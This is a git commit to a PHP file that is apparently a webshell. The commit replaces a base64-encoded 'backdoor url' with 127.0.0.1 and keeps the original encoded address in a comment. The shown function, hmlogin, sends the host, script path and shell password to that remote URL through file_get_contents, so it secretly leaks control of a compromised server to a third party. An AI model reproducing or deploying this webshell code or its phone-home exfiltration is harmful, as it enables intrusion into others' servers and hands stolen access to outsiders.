Update DOC_ZIBSZXBIEG.php

change backdoor url to http://127.0.0.1//
This commit is contained in:
tennc 2018-07-25 21:27:17 +08:00 committed by GitHub
parent e872dddc41
commit a66ed66680
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1265,7 +1265,7 @@ function hmlogin($xiao=1){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
$copyurl = base64_decode('aHR0cDovLzEyNy4wLjAuMS8v'); //aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
$re=file_get_contents($url);
@ -2485,4 +2485,4 @@ class zip
}
ob_end_flush();
?>
?>